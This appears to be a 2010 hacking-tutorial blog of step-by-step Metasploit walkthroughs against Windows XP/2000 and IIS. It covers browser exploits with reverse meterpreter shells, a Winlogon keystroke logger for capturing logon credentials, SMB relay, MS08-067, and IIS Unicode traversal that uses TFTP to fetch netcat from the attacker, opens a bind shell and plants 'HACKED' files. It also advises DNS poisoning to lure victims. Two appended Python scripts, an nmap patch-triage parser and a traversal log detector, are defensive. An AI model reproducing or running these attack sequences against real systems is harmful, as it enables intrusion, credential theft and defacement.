cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Tuesday, March 9, 2010
Tutorial: Keystroke Logger with Meterpreter
Target: 131.107.1.50 (Windows XP SP2 English)
Yours: 131.107.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use DNS poisoning or cache poisoning to replace the bare IP address with a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate to a process (Explorer.exe or Winlogon.exe)
Note:
- Migrate to Explorer.exe if you want to capture the desktop keystrokes.
- Migrate to Winlogon.exe if you want to capture the Windows logon keystrokes.
List all processes...
meterpreter > ps
Migrate to Explorer.exe or Winlogon.exe (use the PID number from the ps listing)
meterpreter > migrate <PID>
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Tutorial: NTLM Hijacking with SMB Relay Exploit
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake path (it does not need to exist)
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session #1
msf > sessions -i 1
Command shell...
meterpreter > shell
Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3
(the target number depends on the O/S, SP level and language found in step 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
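Step 1 above checks a single host. To triage a whole subnet, the nmap output has to be parsed rather than read by eye. The helper below is an added example and is not part of the original tutorial: it reads nmap's normal output, maps each host to the state of every smb-check-vulns check, and lists the hosts that still need the MS08-067 patch. The sample output is constructed (the second host, 192.168.1.60, and the exact line layout are assumptions modelled on nmap 5.x output).

```python
"""Summarise nmap smb-check-vulns results per host from normal (text) output."""
import re

# Host header line; nmap 5.x printed "Interesting ports on X:", later
# versions print "Nmap scan report for X". Both forms are accepted.
_HOST_RE = re.compile(r"^(?:Nmap scan report for|Interesting ports on) (.+?):?$")

# One check line inside the script block, e.g. "|   MS08-067: VULNERABLE"
# or the closing "|_  MS07-029: NOT VULNERABLE".
_CHECK_RE = re.compile(r"^\|[_ ]\s+(?P<name>[^:]+): (?P<state>.+)$")


def parse_smb_check_vulns(output: str) -> dict:
    """Return {host: {check name: state}} for every host in the output."""
    results = {}
    host = None
    in_script = False
    for line in output.splitlines():
        m = _HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            results[host] = {}
            in_script = False
            continue
        if line.startswith("| smb-check-vulns:"):
            in_script = True
            continue
        if in_script and host is not None:
            m = _CHECK_RE.match(line)
            if m:
                results[host][m.group("name").strip()] = m.group("state").strip()
                if line.startswith("|_"):      # last line of the script block
                    in_script = False
            else:
                in_script = False              # block ended without "|_"
    return results


def vulnerable_hosts(results: dict, check: str = "MS08-067") -> list:
    """Hosts whose state for `check` begins with VULNERABLE (not NOT VULNERABLE)."""
    return sorted(
        host for host, checks in results.items()
        if checks.get(check, "").upper().startswith("VULNERABLE")
    )


# Constructed sample output: one unpatched host and one patched host.
SAMPLE_NMAP = """\
Starting Nmap 5.00 ( http://nmap.org )
Interesting ports on 192.168.1.50:
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NOT VULNERABLE
|_  MS07-029: NOT VULNERABLE

Interesting ports on 192.168.1.60:
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NOT VULNERABLE
|_  MS07-029: NOT VULNERABLE
"""

if __name__ == "__main__":
    parsed = parse_smb_check_vulns(SAMPLE_NMAP)
    for host, checks in parsed.items():
        print(host, checks)
    print("Still missing MS08-067:", vulnerable_hosts(parsed))
```

Feed it the saved output of the same nmap command run against a range (`nmap -sS --script=smb-check-vulns 192.168.1.0/24 -oN scan.txt`) and the returned list is the patch work queue.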
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started TFTPD service (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from /pentest/windows_binaries/tools directory to /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode on the target (port 5555), spawning a command shell when a client connects
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our privilege level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
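The requests in steps 1 to 4 work because the server decoded the path twice (`%255c` becomes `%5c`, which becomes a backslash) while its traversal check only looked at the first pass. A log-side detector therefore has to decode the same way. The script below is an added example, not part of the original tutorial: it percent-decodes request paths until they stop changing, also maps the overlong UTF-8 forms of the separators (`%c0%af` for `/`, `%c1%9c` for `\`) that the original IIS Unicode bug accepted, and flags any decoded path that contains a `..` segment. The log lines are constructed in IIS W3C extended format; the field layout and client addresses are assumptions.

```python
"""Flag encoded directory-traversal requests in IIS-style W3C logs."""
import re
from urllib.parse import unquote_to_bytes

# After full decoding, a traversal segment is ".." bounded by separators.
_TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Overlong UTF-8 encodings of '/' and '\' that a lenient decoder accepted;
# a strict UTF-8 decoder rejects them, so they are mapped explicitly here.
_OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def fully_decode(path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the result stops changing (%255c -> %5c -> '\\').

    The round limit keeps a pathological input from looping forever.
    """
    raw = path.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for overlong, plain in _OVERLONG.items():
        raw = raw.replace(overlong, plain)
    return raw.decode("utf-8", errors="replace")


def is_traversal(path: str) -> bool:
    """True when the fully decoded path contains a '..' segment."""
    return _TRAVERSAL.search(fully_decode(path)) is not None


def scan_log(text: str) -> list:
    """One finding per request whose cs-uri-stem decodes to a traversal."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):   # W3C directive lines
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, client, method, stem, query, status = fields[:7]
        if is_traversal(stem):
            findings.append({
                "time": f"{date} {time}",
                "client": client,
                "raw": stem,
                "decoded": fully_decode(stem),
                "status": status,
            })
    return findings


# Constructed sample log (IIS W3C extended format); the addresses are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-03-08 10:01:02 10.0.0.7 GET /default.htm - 200
2010-03-08 10:01:05 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2010-03-08 10:01:07 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+nc.exe 200
2010-03-08 10:01:09 10.0.0.4 GET /images/logo.gif - 200
2010-03-08 10:01:11 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2010-03-08 10:01:13 10.0.0.4 GET /docs/release..notes.htm - 404
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['raw']} -> {f['decoded']} ({f['status']})")
```

A status of 200 on a flagged line is the important signal: it means the server served the traversed path instead of rejecting it. The `release..notes.htm` line shows why the regex requires a separator on both sides of the `..`; a bare pair of dots inside a file name is not a traversal.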